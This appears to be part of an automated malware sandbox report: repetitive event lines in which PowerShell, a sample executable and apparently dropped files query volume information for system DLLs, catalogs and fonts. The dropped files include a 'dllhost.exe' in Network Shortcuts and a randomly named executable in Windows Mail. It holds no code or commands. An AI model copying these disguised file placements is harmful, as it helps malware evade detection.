Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Users\user\Desktop\4Awb1u1GcJ.exe VolumeInformation
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Queries volume information: C:\Users\user\Desktop\4Awb1u1GcJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
